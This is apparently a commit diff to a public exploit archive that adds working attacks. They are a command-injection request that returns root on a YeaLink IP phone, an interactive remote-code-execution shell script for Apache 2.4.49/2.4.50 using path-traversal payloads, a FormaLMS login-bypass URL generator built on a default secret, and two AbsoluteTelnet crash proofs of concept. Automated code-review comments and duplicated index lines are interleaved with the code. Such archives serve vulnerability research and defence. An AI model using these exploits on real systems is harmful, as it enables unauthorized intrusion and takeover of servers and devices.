DB: 2021-11-12
5 changes to exploits/shellcodes AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC) AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC) YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated) Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) FormaLMS 2.4.4 - Authentication Bypass
This commit is contained in:
parent
c26eab756e
commit
5310d503ac
6 changed files with 294 additions and 0 deletions
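--- /dev/null
+++ b/exploits/hardware/webapps/50509.txt
@@ -0,0 +1,44 @@
+# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
+# Date: 11-10-2021
+# Exploit Author: tahaafarooq
+# Vendor Homepage: https://www.yealink.com/
+# Version: 53.84.0.15
+# Tested on: YeaLink IP Phone SIP-T19P (Hadrware VOIP Phone)
+
+Description:
+
+Using Diagnostic tool from the Networking Tab to perform a Ping or Traceroute , to perform OS command injection
+
+POC:
+
+POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+Content-Length: 49
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: */*
+Origin: http://xxx.xxx.xxx.xxx
+Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: JSESSIONID=9a83d24461329a130
+Connection: close
+
+cmd=; id;&token=1714636915c6acea98
+
+-------------------------------------------------
+
+HTTP/1.1 200 OK
+Content-Type: text/html
+Connection: close
+Date: Wed, 10 Nov 2021 14:20:23 GMT
+Server: embed httpd
+Content-Length: 82
+
+<html>
+<body>
+<div id="_RES_INFO_">
+uid=0(root) gid=0(root)
+</div>
+</body>
+</html>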
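--- /dev/null
+++ b/exploits/multiple/webapps/50512.py
@@ -0,0 +1,121 @@
+# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
+# Date: 11/11/2021
+# Exploit Author: Valentin Lobstein
+# Vendor Homepage: https://apache.org/
+# Software Link: https://github.com/Balgogan/CVE-2021-41773
+# Version: Apache 2.4.49/2.4.50 (CGI enabled)
+# Tested on: Debian GNU/Linux
+# CVE : CVE-2021-41773 / CVE-2021-42013
+# Credits : Lucas Schnell
+
+
+#!/usr/bin/env python3
+#coding: utf-8
+
+import os
+import re
+import sys
+import time
+import requests
+from colorama import Fore,Style
+
+
+header = '''\033[1;91m
+
+▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████
+▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀
+▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███
+░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄
+▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
+▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░
+▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░
+░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░
+''' + Style.RESET_ALL
+
+
+if len(sys.argv) < 2 :
+    print( 'Use: python3 file.py ip:port ' )
+    sys.exit()
+
+def end():
+    print("\t\033[1;91m[!] Bye bye !")
+    time.sleep(0.5)
+    sys.exit(1)
+
+def commands(url,command,session):
+    directory = mute_command(url,'pwd')
+    user = mute_command(url,'whoami')
+    hostname = mute_command(url,'hostname')
+    advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')
+    command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}")
+    command = f"echo; {command};"
+    req = requests.Request('POST', url=url, data=command)
+    prepare = req.prepare()
+    prepare.url = url
+    response = session.send(prepare, timeout=5)
+    output = response.text
+    print(output)
+    if 'clear' in command:
+        os.system('/usr/bin/clear')
+        print(header)
+    if 'exit' in command:
+        end()
+
+def mute_command(url,command):
+    session = requests.Session()
+    req = requests.Request('POST', url=url, data=f"echo; {command}")
+    prepare = req.prepare()
+    prepare.url = url
+    response = session.send(prepare, timeout=5)
+    return response.text.strip()
+
+
+def exploitRCE(payload):
+    s = requests.Session()
+    try:
+        host = sys.argv[1]
+        if 'http' not in host:
+            url = 'http://'+ host + payload
+        else:
+            url = host + payload
+        session = requests.Session()
+        command = "echo; id"
+        req = requests.Request('POST', url=url, data=command)
+        prepare = req.prepare()
+        prepare.url = url
+        response = session.send(prepare, timeout=5)
+        output = response.text
+        if "uid" in output:
+            choice = "Y"
+            print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host)
+            print("[!] Sortie:\n\n" + Fore.YELLOW + output )
+            choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")
+            if choice.lower() in ['','y','yes']:
+                while True:
+                    commands(url,command,session)
+            else:
+                end()
+        else :
+            print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)
+    except KeyboardInterrupt:
+        end()
+
+def main():
+    try:
+        apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
+        apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'
+        payloads = [apache2449_payload,apache2450_payload]
+        choice = len(payloads) + 1
+        print(header)
+        print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")
+        while choice >= len(payloads) and choice >= 0:
+            choice = int(input('[~] Choice : '))
+            if choice < len(payloads):
+                exploitRCE(payloads[choice])
+    except KeyboardInterrupt:
+        print("\n\033[1;91m[!] Bye bye !")
+        time.sleep(0.5)
+        sys.exit(1)
+
+if __name__ == '__main__':
+    main()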
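Review bot: `#!/usr/bin/env python3` sits on the file's 12th line, below the `# Exploit Title:` header block, so it is an ordinary comment rather than an interpreter directive; since the file is added with the executable bit, either move it to line 1 or drop the executable mode. Several names are bound and never read: `import re`, `s = requests.Session()` at the top of `exploitRCE`, and `advise = print(...)` in `commands`, which always stores `None` (`advise = ` can be dropped). The `command` parameter of `commands` is overwritten by `input()` on the next lines before it is used, so it could be removed from the signature or documented as a placeholder. Indentation in this rendered view is lost, so the nesting of `if choice < len(payloads):` inside the `while` in `main` is inferred rather than visible.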
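--- /dev/null
+++ b/exploits/multiple/webapps/50513.py
@@ -0,0 +1,51 @@
+# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass
+# Google Dork: inurl:index.php?r=adm/
+# Date: 2021-11-10
+# Exploit Author: Cristian 'void' Giustini @ Hacktive Security
+# Vendor Homepage: https://formalms.org
+# Software Link: https://formalms.org
+# Version: <= 2.4.4
+# Tested on: Linux
+# CVE : CVE-2021-43136
+
+# Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain a valid access to the platform.
+
+# Analysis:
+https://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/
+
+# Nuclei template:
+https://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml
+
+#!/usr/bin/env python
+
+"""
+
+The following exploit generates two URLs with empty and fixed value of the "secret". In order to achieve a successful exploitation the "Enable SSO with a third party software through a token" setting needs to be enabled
+
+"""
+
+import sys
+import time
+import hashlib
+
+secret = "8ca0f69afeacc7022d1e589221072d6bcf87e39c"
+
+def help():
+
+    print(f"Usage: {sys.argv[0]} username target_url")
+
+    sys.exit()
+
+
+if len(sys.argv) < 3:
+
+    help()
+
+user, url = (sys.argv[1], sys.argv[2])
+t = str(int(time.time()) + 5000)
+token = hashlib.md5(f"{user},{t},{secret}".encode()).hexdigest().upper()
+final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
+print(f"URL with default secret: {final_url}")
+token = hashlib.md5(f"{user},{t},".encode()).hexdigest().upper()
+final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
+print(f"URL with empty secret: {final_url}")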
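Review bot: The two bare URL lines under `# Analysis:` and `# Nuclei template:` are not comments as rendered here, so the module would fail to parse before any statement runs (`https://...` at statement level is a syntax error); they should read `# https://...`. The `#!/usr/bin/env python` line is likewise inert because it is not on line 1, which matters for a file committed with the executable bit. `def help():` shadows the builtin `help`; a name such as `usage()` avoids that. The `secret` constant deserves a one-line comment stating what it is — presumably the product's default SSO token secret described in the linked analysis, which cannot be confirmed from this file alone — and the docstring could note that `t` is the current time plus 5000 seconds so a reader knows why the value is offset.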
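--- /dev/null
+++ b/exploits/windows/dos/50510.py
@@ -0,0 +1,37 @@
+# Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2021-11-10
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
+# Tested Version: 11.24
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
+
+# Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC)
+
+# Steps to reproduce:
+# 1. - Download and install AbsoluteTelnet
+# 2. - Run the python script and it will create exploit.txt file.
+# 3. - Open AbsoluteTelnet 11.24
+# 4. - "new connection file -> Connection -> SSH1 & SSH2"
+# 5. - Paste the characters of txt file to "Authentication -> Username"
+# 6. - press "ok" button
+# 7. - Crashed
+# 8. - Reopen AbsoluteTelnet 11.24
+# 9. - Copy the same characters to "Your Email Address (optional)"
+# 10.- Click "Send Error Report" button
+# 11.- Crashed
+
+
+#!/usr/bin/python
+
+exploit = 'A' * 1000
+
+try:
+    file = open("exploit.txt","w")
+    file.write(exploit)
+    file.close()
+
+    print("POC is created")
+except:
+    print("POC not created")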
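Review bot: The bare `except:` around the file write swallows every exception, including `KeyboardInterrupt` and `SystemExit`, and discards the reason the file could not be created; the same pattern appears in exploits/windows/dos/50511.py. Narrow it and use a context manager so the handle is closed on every path and the builtin `file` is not shadowed: `with open("exploit.txt", "w") as fh:` / `fh.write(exploit)` and `except OSError as err:` / `print(f"POC not created: {err}")`. The `#!/usr/bin/python` line is also not on line 1, so it is an ordinary comment and the file's executable bit has no effect.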
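--- /dev/null
+++ b/exploits/windows/dos/50511.py
@@ -0,0 +1,36 @@
+# Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2021-11-10
+# Vendor Homepage: https://www.celestialsoftware.net/
+# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
+# Tested Version: 11.24
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
+
+# Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC)
+
+# Steps to reproduce:
+# 1. - Download and install AbsoluteTelnet
+# 2. - Run the python script and it will create exploit.txt file.
+# 3. - Open AbsoluteTelnet 11.24
+# 4. - "new connection file -> DialUp Connection
+# 5. - Paste the characters of txt file to "DialUp -> phone"
+# 6. - press "ok" button
+# 7. - Crashed
+# 8. - Reopen AbsoluteTelnet 11.24
+# 9. - Copy the same characters to "license name"
+# 10.- Click "Send Error Report" button
+# 11.- Crashed
+
+#!/usr/bin/python
+
+exploit = 'A' * 1000
+
+try:
+    file = open("exploit.txt","w")
+    file.write(exploit)
+    file.close()
+
+    print("POC is created")
+except:
+    print("POC not created")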
@ -6803,6 +6803,8 @@ id,file,description,date,author,type,platform,port
50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
50434,exploits/windows/dos/50434.py,"NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
50510,exploits/windows/dos/50510.py,"AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
50511,exploits/windows/dos/50511.py,"AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@ -44606,3 +44608,6 @@ id,file,description,date,author,type,platform,port
50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php,
50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php,
50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ragavender A G",webapps,php,
50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ragavender A G",webapps,php,
50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php,
50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php,
50509,exploits/hardware/webapps/50509.txt,"YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)",1970-01-01,tahaafarooq,webapps,hardware,
50512,exploits/multiple/webapps/50512.py,"Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)",1970-01-01,"Valentin Lobstein",webapps,multiple,
50513,exploits/multiple/webapps/50513.py,"FormaLMS 2.4.4 - Authentication Bypass",1970-01-01,"Cristian \'void\' Giustini",webapps,multiple,